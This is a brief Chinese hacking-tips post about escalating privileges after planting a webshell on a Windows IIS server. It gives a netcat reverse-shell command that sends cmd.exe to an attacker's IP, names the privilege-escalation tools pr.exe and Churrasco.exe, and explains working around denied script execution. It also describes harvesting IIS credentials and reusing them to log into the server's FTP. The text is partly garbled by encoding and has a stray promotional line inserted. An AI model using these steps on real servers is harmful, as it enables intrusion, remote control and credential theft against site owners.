webshell下提權(quán)兩個(gè)小技巧分享
cmd路徑:
c:\windows\temp\cmd.exe
nc也在同目錄下
例如反彈cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不會(huì)成功。
而直接在 cmd路徑上 輸入 c:\windows\temp\nc.exe
命令輸入 -vv ip 999 -e c:\windows\temp\cmd.exe
卻能成功。。
這個(gè)不是重點(diǎn)
我們通常 執(zhí)行 pr.exe 或 Churrasco.exe 時(shí) 有時(shí)候也需要 按照上面的 方法才能成功。
友情檢測波爾遠(yuǎn)程控制官方網(wǎng)站
作者:MYC00l [Y.D.T]
第一處:把代碼保存為1.vbs 上傳到服務(wù)器上,執(zhí)行cscript 1.vbs,又提示拒絕訪問。

其實(shí)這里,我們只要自己上傳一個(gè)cscript.exe 一般就可以解決問題,這個(gè)程序默認(rèn)位于系統(tǒng)文件夾下,是win32 控制臺(tái)下的腳本宿主引擎,用來執(zhí)行vbs 等腳本程序的。
第二處:用VBS腳本查看到目標(biāo)IIS帳號和密碼后,CMD下FTP發(fā)現(xiàn)目標(biāo)用的是微軟FTP,直接用IIS帳號和密碼登錄進(jìn)去了。
IIS帳號和密碼和微軟自帶的FTP帳號和密碼默認(rèn)都是一樣的。
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
關(guān)注官方微信